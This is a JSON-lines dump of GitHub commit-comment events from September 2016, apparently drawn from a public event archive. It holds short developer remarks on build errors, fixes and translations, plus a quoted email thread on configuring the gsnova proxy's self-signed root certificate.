{"id":"4546742570","type":"CommitCommentEvent","actor":{"login":"blackfalcon371"},"repo":{"name":"blackfalcon371/CRUD"},"payload":{"comment":{"id":18978589,"position":null,"line":null,"path":null,"commit_id":"4a00983214a86e10d7bea1183f081fe7a92521c7","created_at":"2016-09-11T23:42:54Z","updated_at":"2016-09-11T23:42:54Z","body":"A primeira imagem é mostrado os dois bancos de dados criados no heroku o mysql e postgree \r\nNa segunda imagem é mostrada um erro onde não pode ser encontrado o arquivo .sql, sendo que ele se encontra no diretório mostrado"}},"created_at":"2016-09-11T23:42:54Z"}
{"id":"4546753355","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978606,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:50:49Z","updated_at":"2016-09-11T23:50:49Z","body":"MY D CODE FINALLY COMPILED!!!!!!!!!!!"}},"created_at":"2016-09-11T23:50:49Z"}
{"id":"4546758679","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978609,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:54:48Z","updated_at":"2016-09-11T23:54:48Z","body":"Now I have to go through bugs that don't cause compiler errors, but CAUSE IT TO NOT RUN!"}},"created_at":"2016-09-11T23:54:48Z"}
{"id":"4546759284","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978610,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:55:14Z","updated_at":"2016-09-11T23:55:14Z","body":"@JoinRajuncraftNow "}},"created_at":"2016-09-11T23:55:14Z"}
{"id":"4546760186","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978616,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:55:58Z","updated_at":"2016-09-11T23:55:58Z","body":"@JoinRajuncraftNow @JoinRajuncraftNow @JoinRajuncraftNow @JoinRajuncraftNow @JoinRajuncraftNow @JoinRajuncraftNow @JoinRajuncraftNow @JoinRajuncraftNow @JoinRajuncraftNow "}},"created_at":"2016-09-11T23:55:58Z"}
{"id":"4546765106","type":"CommitCommentEvent","actor":{"login":"mhsjlw"},"repo":{"name":"UnknownShadow200/ClassicalSharp"},"payload":{"comment":{"id":18978620,"position":null,"line":null,"path":null,"commit_id":"da8ebc61b12a4a9e5196afb0c6881296b2f85ded","created_at":"2016-09-11T23:59:49Z","updated_at":"2016-09-11T23:59:49Z","body":"Possible ETA for android support?"}},"created_at":"2016-09-11T23:59:49Z"}
{"id":"4545124991","type":"CommitCommentEvent","actor":{"login":"prashantkhurana"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18975848,"position":4,"line":52,"path":"app/src/main/AndroidManifest.xml","commit_id":"e0f734459ef5140263a715060c2a36a154d2dc44","created_at":"2016-09-11T03:01:16Z","updated_at":"2016-09-11T03:01:16Z","body":"yes, changing to adjustPan fixes it. This change was done for both MainActivity and CommentsScreen. Just reverting  MainActivity fixes it. Must be a Nougat issue, if it works for you. https://www.reddit.com/r/slideforreddit/comments/522wgg/go_to_subreddit_not_working/ mentions this, but at the time it was working for me. With the update it stopped, but for them it fixed automatically somehow. "}},"created_at":"2016-09-11T03:01:16Z"}
{"id":"4545125685","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":18975850,"position":null,"line":null,"path":null,"commit_id":"492dc29e4345f0cbed289987cf2da1ed9bdf35fb","created_at":"2016-09-11T03:01:59Z","updated_at":"2016-09-11T03:01:59Z","body":"@cala this commit.... I need to redo it and redo the flags.... the level changes are fine but all the flag changes, those are not so fine..."}},"created_at":"2016-09-11T03:01:59Z"}
{"id":"4545128248","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18975853,"position":6,"line":19,"path":"includes/Config/i18nFrontEnd.php","commit_id":"a1b780981ed74ee5d8863923fa39cc6ebce0ecb8","created_at":"2016-09-11T03:04:14Z","updated_at":"2016-09-11T03:04:14Z","body":"@fjarrett PR submitted: #1750"}},"created_at":"2016-09-11T03:04:14Z"}
{"id":"4545128764","type":"CommitCommentEvent","actor":{"login":"bokatan"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18975856,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-11T03:04:45Z","updated_at":"2016-09-11T03:04:45Z","body":"What do you mean? The statement is clear: \r\n\r\nYou also agree that you will respect the intellectual property rights of\r\n     others\r\n\r\nIf you are referring to the green part, that was not there for my OP. As far as Tumblr posting ads. Social media money making is the way it is. I hate that their ads have sound, but oh well."}},"created_at":"2016-09-11T03:04:45Z"}
{"id":"4545129961","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975860,"position":null,"line":null,"path":null,"commit_id":"3ace3ce28625b580113bc8e513ce7e671b9538a2","created_at":"2016-09-11T03:05:58Z","updated_at":"2016-09-11T03:05:58Z","body":"Okay dude hope it will work."}},"created_at":"2016-09-11T03:05:58Z"}
{"id":"4545131889","type":"CommitCommentEvent","actor":{"login":"nabilafirst"},"repo":{"name":"nabilafirst/TiketKeretaApi"},"payload":{"comment":{"id":18975862,"position":null,"line":null,"path":null,"commit_id":"b12b63d979fa14aacf4ea9fd3bb2ea2e198cab16","created_at":"2016-09-11T03:07:55Z","updated_at":"2016-09-11T03:07:55Z","body":"![screenshot_20160911_100153](https://cloud.githubusercontent.com/assets/22027035/18414907/fcfaa010-7806-11e6-8eb9-9236dd51b00b.png)\r\n![screenshot_20160911_100151](https://cloud.githubusercontent.com/assets/22027035/18414908/fd5b8d1c-7806-11e6-8050-1b065a816953.png)\r\n![screenshot_20160911_100112](https://cloud.githubusercontent.com/assets/22027035/18414909/fd643692-7806-11e6-88be-6e42c9af953b.png)\r\n![screenshot_20160911_100109](https://cloud.githubusercontent.com/assets/22027035/18414910/fd87a2c6-7806-11e6-9ded-6a73d7ddf415.png)\r\n"}},"created_at":"2016-09-11T03:07:55Z"}
{"id":"4545136157","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18975870,"position":null,"line":null,"path":null,"commit_id":"c534171d377561b35a3c015e2f46a46ba399fac3","created_at":"2016-09-11T03:12:10Z","updated_at":"2016-09-11T03:12:10Z","body":"Ligado sem Internet não existe... isto aparece quando se instala o sistema de novo e se chega à etapa de introduzir a palavra-passe no Wi-Fi e o momento da ligação é a Ligar... Não sei quem traduziu isto nas terras do oriente, mas nesse dia não devia estar bem com certeza... Mas se quiseres deixar incorrecto deixa..."}},"created_at":"2016-09-11T03:12:10Z"}
{"id":"4545138717","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975875,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T03:14:44Z","updated_at":"2016-09-11T03:14:44Z","body":"are u using firefox?  firefox use different way to verify the root CA file,\nChrome/IE use system's root CA store.  u can google how to import the root\nCA file for firefox.\n\nyuan78 <notifications@github.com>于2016年9月11日周日 上午10:35写道：\n\n> Yes, already import the fakecert into trusted root certification\n> authorities, but still cannot work and always report \"your link is not a\n> private link\" . Also the same result to Ubuntu platform\n> Can u test it from your side?\n>\n> 2016-09-11 10:00 GMT+08:00 yinqiwen <notifications@github.com>:\n>\n> > the cert file must be added into trusted root certification authorities\n> > store. This is a example\n> > https://blogs.technet.microsoft.com/sbs/2008/05/08/\n> > installing-a-self-signed-certificate-as-a-trusted-root-\n> > ca-in-windows-vista/\n> >\n> > 2016年9月11日 上午9:25，\"yuan78\" <notifications@github.com>写道：\n> >\n> > > Have imported fakecert, but the browser Chrome still report https error\n> > of\n> > > \"your link is not a private link\"\n> > >\n> > > 2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n> > >\n> > > > Add your ip into hosts.json. For gae, u should configure your ip for\n> > '*.\n> > > > appspot.com' .\n> > > >\n> > > > For fakecert issue, u must import the 'Fake-ACRoot-Certificate.cer'\n> > into\n> > > > your os's root CA to avoid the warnings of browsers, u can follow\n> > 12306's\n> > > > guide to import a root CA file. (12306 force u to import it's root CA\n> > > file\n> > > > if u want to use it's service.)\n> > > >\n> > > > u can generate the facecert files by openssl's command line tools,\n> but\n> > > > it's complicated and i'm not remember how to do it now, can not give\n> > any\n> > > > advice.\n> > > >\n> > > > —\n> > > > You are receiving this because you commented.\n> > > > Reply to this email directly, view it on GitHub\n> > > > <https://github.com/yinqiwen/gsnova/commit/\n> > > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18974012>,\n> > > > or mute the thread\n> > > > <https://github.com/notifications/unsubscribe-auth/AK_\n> > > y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n> > > > .\n> > > >\n> > >\n> > > —\n> > > You are receiving this because you authored the thread.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/yinqiwen/gsnova/commit/\n> > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975617>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/\n> > AANmT0eqmWquNK2el3MjABw0GcS84g6Yks5qo1iIgaJpZM4J5oQB>\n> >\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975681\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AK_y729lEUAaewvv8nY3I0BCa_rShYe_ks5qo2CygaJpZM4J5oQB\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975790>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AANmTzbhZTS9ZWv859c7Kc5mnwsxMPogks5qo2jXgaJpZM4J5oQB>\n> .\n>\n-- \nyinqiwen\n"}},"created_at":"2016-09-11T03:14:44Z"}
{"id":"4545140826","type":"CommitCommentEvent","actor":{"login":"ForgotForever"},"repo":{"name":"ForgotForever/helloWorld"},"payload":{"comment":{"id":18975878,"position":null,"line":null,"path":null,"commit_id":"302978c947be12f15385af13c427cf9bee900a48","created_at":"2016-09-11T03:17:03Z","updated_at":"2016-09-11T03:17:03Z","body":"show"}},"created_at":"2016-09-11T03:17:03Z"}
{"id":"4545142416","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975879,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T03:18:39Z","updated_at":"2016-09-11T03:18:39Z","body":"and the gae support in gsnova is not stable enough, i suggest u  use\npaas/vps mode  which is more stable and have no need to import the fakecert\nfile.\n\nyinqiwen <yinqiwen@gmail.com>于2016年9月11日周日 上午11:14写道：\n\n> are u using firefox?  firefox use different way to verify the root CA\n> file, Chrome/IE use system's root CA store.  u can google how to import the\n> root CA file for firefox.\n>\n> yuan78 <notifications@github.com>于2016年9月11日周日 上午10:35写道：\n>\n>> Yes, already import the fakecert into trusted root certification\n>> authorities, but still cannot work and always report \"your link is not a\n>> private link\" . Also the same result to Ubuntu platform\n>> Can u test it from your side?\n>>\n>> 2016-09-11 10:00 GMT+08:00 yinqiwen <notifications@github.com>:\n>>\n>> > the cert file must be added into trusted root certification authorities\n>> > store. This is a example\n>> > https://blogs.technet.microsoft.com/sbs/2008/05/08/\n>> > installing-a-self-signed-certificate-as-a-trusted-root-\n>> > ca-in-windows-vista/\n>> >\n>> > 2016年9月11日 上午9:25，\"yuan78\" <notifications@github.com>写道：\n>> >\n>> > > Have imported fakecert, but the browser Chrome still report https\n>> error\n>> > of\n>> > > \"your link is not a private link\"\n>> > >\n>> > > 2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n>> > >\n>> > > > Add your ip into hosts.json. For gae, u should configure your ip for\n>> > '*.\n>> > > > appspot.com' .\n>> > > >\n>> > > > For fakecert issue, u must import the 'Fake-ACRoot-Certificate.cer'\n>> > into\n>> > > > your os's root CA to avoid the warnings of browsers, u can follow\n>> > 12306's\n>> > > > guide to import a root CA file. (12306 force u to import it's root\n>> CA\n>> > > file\n>> > > > if u want to use it's service.)\n>> > > >\n>> > > > u can generate the facecert files by openssl's command line tools,\n>> but\n>> > > > it's complicated and i'm not remember how to do it now, can not give\n>> > any\n>> > > > advice.\n>> > > >\n>> > > > —\n>> > > > You are receiving this because you commented.\n>> > > > Reply to this email directly, view it on GitHub\n>> > > > <https://github.com/yinqiwen/gsnova/commit/\n>> > > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18974012>,\n>> > > > or mute the thread\n>> > > > <https://github.com/notifications/unsubscribe-auth/AK_\n>> > > y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n>> > > > .\n>> > > >\n>> > >\n>> > > —\n>> > > You are receiving this because you authored the thread.\n>> > > Reply to this email directly, view it on GitHub\n>> > > <https://github.com/yinqiwen/gsnova/commit/\n>> > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975617>,\n>> > > or mute the thread\n>> > > <https://github.com/notifications/unsubscribe-auth/\n>> > AANmT0eqmWquNK2el3MjABw0GcS84g6Yks5qo1iIgaJpZM4J5oQB>\n>> >\n>> > > .\n>> > >\n>> >\n>> > —\n>> > You are receiving this because you commented.\n>> > Reply to this email directly, view it on GitHub\n>> > <\n>> https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975681\n>> >,\n>> > or mute the thread\n>> > <\n>> https://github.com/notifications/unsubscribe-auth/AK_y729lEUAaewvv8nY3I0BCa_rShYe_ks5qo2CygaJpZM4J5oQB\n>> >\n>> > .\n>> >\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975790>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AANmTzbhZTS9ZWv859c7Kc5mnwsxMPogks5qo2jXgaJpZM4J5oQB>\n>> .\n>>\n> --\n> yinqiwen\n>\n-- \nyinqiwen\n"}},"created_at":"2016-09-11T03:18:39Z"}
{"id":"4545143654","type":"CommitCommentEvent","actor":{"login":"student50"},"repo":{"name":"student50/tmp"},"payload":{"comment":{"id":18975880,"position":null,"line":null,"path":null,"commit_id":"b7796075c67e695b1f7a887d3f605852686a6233","created_at":"2016-09-11T03:20:01Z","updated_at":"2016-09-11T03:20:01Z","body":"test"}},"created_at":"2016-09-11T03:20:01Z"}
{"id":"4545146691","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975888,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T03:22:56Z","updated_at":"2016-09-11T03:22:56Z","body":"fix_gcc48_ICE (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-11T03:22:56Z"}
{"id":"4545148963","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"JuliaLang/IJulia.jl"},"payload":{"comment":{"id":18975893,"position":null,"line":null,"path":null,"commit_id":"df0eec2e009f5f3cb873375fd1c2c69870ab725c","created_at":"2016-09-11T03:25:18Z","updated_at":"2016-09-11T03:25:18Z","body":"Sure; can you file an issue there so I don't forget?"}},"created_at":"2016-09-11T03:25:18Z"}
{"id":"4545149399","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18975894,"position":85,"line":5912,"path":"src/server/game/Spells/Auras/SpellAuraEffects.cpp","commit_id":"40dad022f9e6403bd3ca94b92477ef54111d015c","created_at":"2016-09-11T03:25:45Z","updated_at":"2016-09-11T03:25:45Z","body":"Good point. fixing"}},"created_at":"2016-09-11T03:25:45Z"}
{"id":"4545149501","type":"CommitCommentEvent","actor":{"login":"Grahamvs"},"repo":{"name":"ziahamza/webui-aria2"},"payload":{"comment":{"id":18975895,"position":null,"line":null,"path":null,"commit_id":"869bc09f17200fb2f585621c19cd44310df2fc7b","created_at":"2016-09-11T03:25:51Z","updated_at":"2016-09-11T03:25:51Z","body":"It seems this commit has broken the website? Removing line 41 of  js/init.js fixes the issue, so I'm guessing there's a formatting issue with js/translate/it_IT.js\r\n"}},"created_at":"2016-09-11T03:25:51Z"}
{"id":"4545151247","type":"CommitCommentEvent","actor":{"login":"drivfe"},"repo":{"name":"d4rken/reddit-android-appstore"},"payload":{"comment":{"id":18975896,"position":117,"line":142,"path":"app/src/main/java/subreddit/android/appstore/screens/details/AppDetailsFragment.java","commit_id":"6995b0fc6c6e9be452ee16f3a3086ff7b9ddd8e2","created_at":"2016-09-11T03:27:41Z","updated_at":"2016-09-11T03:27:41Z","body":"ACTION_VIEW, http://reddit.com/u/<user>"}},"created_at":"2016-09-11T03:27:41Z"}
{"id":"4545152713","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"unrealircd/unrealircd"},"payload":{"comment":{"id":18975898,"position":null,"line":null,"path":null,"commit_id":"6a9b32344ebaaed875e15149575ae79efd779b07","created_at":"2016-09-11T03:29:15Z","updated_at":"2016-09-11T03:29:15Z","body":"So why not just make it one place? ^^"}},"created_at":"2016-09-11T03:29:15Z"}
{"id":"4545157812","type":"CommitCommentEvent","actor":{"login":"student50"},"repo":{"name":"student50/tmp"},"payload":{"comment":{"id":18975902,"position":1,"line":1,"path":"capitalize0.c","commit_id":"f08c240e52f4e8bdecee12d6acbc3fcafec1c633","created_at":"2016-09-11T03:34:32Z","updated_at":"2016-09-11T03:34:32Z","body":"comment1"}},"created_at":"2016-09-11T03:34:32Z"}
{"id":"4545157863","type":"CommitCommentEvent","actor":{"login":"student50"},"repo":{"name":"student50/tmp"},"payload":{"comment":{"id":18975903,"position":5,"line":5,"path":"capitalize2.c","commit_id":"f08c240e52f4e8bdecee12d6acbc3fcafec1c633","created_at":"2016-09-11T03:34:36Z","updated_at":"2016-09-11T03:34:36Z","body":"comment2"}},"created_at":"2016-09-11T03:34:36Z"}
{"id":"4545158371","type":"CommitCommentEvent","actor":{"login":"rbong"},"repo":{"name":"rbong/gitv"},"payload":{"comment":{"id":18975905,"position":null,"line":null,"path":null,"commit_id":"11409f17396747756302dff9fdabc18a1ec29b3f","created_at":"2016-09-11T03:35:12Z","updated_at":"2016-09-11T03:35:12Z","body":"`let g:result...` is an unintentional debugging line left in"}},"created_at":"2016-09-11T03:35:12Z"}
{"id":"4545159933","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975907,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T03:36:52Z","updated_at":"2016-09-11T03:36:52Z","body":"I hv updated your latest gae remote(disable chacha20) and update the google\nIP with GWS IP, it's OK now, it turned out  not to be the issue of fakecert\n.\n\nBut it seems gsnova cannot support GVS IP for GAE but only support GWS IP.\nCan you let gsnova support GVS IP (to change cypher method can achieve it,\nyou can refer to Goproxy of phuslu for details ), THX!\n\n2016-09-11 11:18 GMT+08:00 yinqiwen <notifications@github.com>:\n\n> and the gae support in gsnova is not stable enough, i suggest u use\n> paas/vps mode which is more stable and have no need to import the fakecert\n> file.\n>\n> yinqiwen <yinqiwen@gmail.com>于2016年9月11日周日 上午11:14写道：\n>\n>\n> > are u using firefox? firefox use different way to verify the root CA\n> > file, Chrome/IE use system's root CA store. u can google how to import\n> the\n> > root CA file for firefox.\n> >\n> > yuan78 <notifications@github.com>于2016年9月11日周日 上午10:35写道：\n> >\n> >> Yes, already import the fakecert into trusted root certification\n> >> authorities, but still cannot work and always report \"your link is not a\n> >> private link\" . Also the same result to Ubuntu platform\n> >> Can u test it from your side?\n> >>\n> >> 2016-09-11 10:00 GMT+08:00 yinqiwen <notifications@github.com>:\n> >>\n> >> > the cert file must be added into trusted root certification\n> authorities\n> >> > store. This is a example\n> >> > https://blogs.technet.microsoft.com/sbs/2008/05/08/\n> >> > installing-a-self-signed-certificate-as-a-trusted-root-\n> >> > ca-in-windows-vista/\n> >> >\n> >> > 2016年9月11日 上午9:25，\"yuan78\" <notifications@github.com>写道：\n> >> >\n> >> > > Have imported fakecert, but the browser Chrome still report https\n> >> error\n> >> > of\n> >> > > \"your link is not a private link\"\n> >> > >\n> >> > > 2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n> >> > >\n> >> > > > Add your ip into hosts.json. For gae, u should configure your ip\n> for\n> >> > '*.\n> >> > > > appspot.com' .\n> >> > > >\n> >> > > > For fakecert issue, u must import the\n> 'Fake-ACRoot-Certificate.cer'\n> >> > into\n> >> > > > your os's root CA to avoid the warnings of browsers, u can follow\n> >> > 12306's\n> >> > > > guide to import a root CA file. (12306 force u to import it's root\n> >> CA\n> >> > > file\n> >> > > > if u want to use it's service.)\n> >> > > >\n> >> > > > u can generate the facecert files by openssl's command line tools,\n> >> but\n> >> > > > it's complicated and i'm not remember how to do it now, can not\n> give\n> >> > any\n> >> > > > advice.\n> >> > > >\n> >> > > > —\n> >> > > > You are receiving this because you commented.\n> >> > > > Reply to this email directly, view it on GitHub\n> >> > > > <https://github.com/yinqiwen/gsnova/commit/\n> >> > > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18974012>,\n> >> > > > or mute the thread\n> >> > > > <https://github.com/notifications/unsubscribe-auth/AK_\n> >> > > y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n> >> > > > .\n> >> > > >\n> >> > >\n> >> > > —\n> >> > > You are receiving this because you authored the thread.\n> >> > > Reply to this email directly, view it on GitHub\n> >> > > <https://github.com/yinqiwen/gsnova/commit/\n> >> > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975617>,\n> >> > > or mute the thread\n> >> > > <https://github.com/notifications/unsubscribe-auth/\n> >> > AANmT0eqmWquNK2el3MjABw0GcS84g6Yks5qo1iIgaJpZM4J5oQB>\n> >> >\n> >> > > .\n> >> > >\n> >> >\n> >> > —\n> >> > You are receiving this because you commented.\n> >> > Reply to this email directly, view it on GitHub\n> >> > <\n> >> https://github.com/yinqiwen/gsnova/commit/\n> 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975681\n> >> >,\n> >> > or mute the thread\n> >> > <\n> >> https://github.com/notifications/unsubscribe-auth/AK_\n> y729lEUAaewvv8nY3I0BCa_rShYe_ks5qo2CygaJpZM4J5oQB\n> >> >\n> >> > .\n> >> >\n> >>\n> >> —\n> >> You are receiving this because you authored the thread.\n> >> Reply to this email directly, view it on GitHub\n> >> <https://github.com/yinqiwen/gsnova/commit/\n> 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975790>,\n> >> or mute the thread\n> >> <https://github.com/notifications/unsubscribe-auth/\n> AANmTzbhZTS9ZWv859c7Kc5mnwsxMPogks5qo2jXgaJpZM4J5oQB>\n> >> .\n> >>\n> > --\n> > yinqiwen\n> >\n> --\n> yinqiwen\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975879>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK_y71MNli95bADlXMomvYCAeKY8R7aYks5qo3MSgaJpZM4J5oQB>\n> .\n>\n"}},"created_at":"2016-09-11T03:36:52Z"}
{"id":"4545160420","type":"CommitCommentEvent","actor":{"login":"SonicNorg"},"repo":{"name":"axel9kislin/classWorks"},"payload":{"comment":{"id":18975909,"position":4,"line":10,"path":".idea/misc.xml","commit_id":"9b22cec22bfab22c9d8add984e978e9e5c330546","created_at":"2016-09-11T03:37:24Z","updated_at":"2016-09-11T03:37:24Z","body":"тот же косяк, что бы у меня в \"типа многомодульном\" проекте, о котором Денис рассказывал вчера: никаких pom-ников внутри сорцов (src/) быть не должно. Архитектура:\r\napp (многомодульный проект)\r\n|__Module1/\r\n    |__src/\r\n    |__pom.xml\r\n|__Module2/\r\n    |__src/\r\n    |__pom.xml\r\npom.xml"}},"created_at":"2016-09-11T03:37:24Z"}
{"id":"4545160601","type":"CommitCommentEvent","actor":{"login":"coomar2841"},"repo":{"name":"coomar2841/android-multipicker-library"},"payload":{"comment":{"id":18975910,"position":null,"line":null,"path":null,"commit_id":"29e7bddef2813666c3158610de59959b7d470490","created_at":"2016-09-11T03:37:39Z","updated_at":"2016-09-11T03:37:39Z","body":"Ooops... Sorry. Changing that. I must have been drunk."}},"created_at":"2016-09-11T03:37:39Z"}
{"id":"4545161350","type":"CommitCommentEvent","actor":{"login":"kageiit"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":18975911,"position":52,"line":381,"path":"src/com/facebook/buck/jvm/java/intellij/IjModuleFactory.java","commit_id":"60058a4f32681808ce5776d9f8bbb348282b5633","created_at":"2016-09-11T03:38:34Z","updated_at":"2016-09-11T03:38:34Z","body":"This will break intellij if the source level is set to `8` instead of `1.8` (which is how intellij creates java sdk names by default)\r\n\r\nTried to fix this in #832\r\n\r\n"}},"created_at":"2016-09-11T03:38:34Z"}
{"id":"4545163606","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18975918,"position":null,"line":null,"path":null,"commit_id":"a673fa8393146d9a8cd1a3bf6f0444bfa23352d7","created_at":"2016-09-11T03:40:52Z","updated_at":"2016-09-11T03:40:52Z","body":"Ahh, gone are the days of having to rely on an invisible symbology layer with no labels to properly balance the columns. Thanks."}},"created_at":"2016-09-11T03:40:52Z"}
{"id":"4545164675","type":"CommitCommentEvent","actor":{"login":"rx2130"},"repo":{"name":"venmo/Static"},"payload":{"comment":{"id":18975920,"position":null,"line":null,"path":null,"commit_id":"ba184b4c879506bc01df0935bc535e4784eafbf1","created_at":"2016-09-11T03:42:11Z","updated_at":"2016-09-11T03:42:11Z","body":"Can you add the cells with different row height into the demo? Since I haven't dealing with constraint in code before and I believe I'm not the only one out there trying to figure this out :)"}},"created_at":"2016-09-11T03:42:11Z"}
{"id":"4545164721","type":"CommitCommentEvent","actor":{"login":"simonsmh"},"repo":{"name":"shadowsocks/openwrt-shadowsocks"},"payload":{"comment":{"id":18975921,"position":null,"line":null,"path":null,"commit_id":"f21785791c559a64500da0aa8863a86b18e357df","created_at":"2016-09-11T03:42:13Z","updated_at":"2016-09-11T03:42:13Z","body":"tmp/.config-package.in:8:warning: ignoring type redefinition of 'PACKAGE_base-files' from 'boolean' to 'tristate'\r\ntmp/.config-package.in:54:warning: ignoring type redefinition of 'PACKAGE_busybox' from 'boolean' to 'tristate'\r\nfeeds/base/package/utils/busybox/config/Config.in:818: glob failed: No files found \"package/utils/busybox/config/libbb/Config.in\"\r\n/var/wwwfiles/files/openwrt/OpenWrt-SDK-15.05.1-ar71xx-nand_gcc-4.8-linaro_uClibc-0.9.33.2.Linux-x86_64/include/toplevel.mk:116: recipe for target 'menuconfig' failed\r\nmake: *** [menuconfig] Error 1\r\n\r\n@aa65535 How to fix it? Thx."}},"created_at":"2016-09-11T03:42:13Z"}
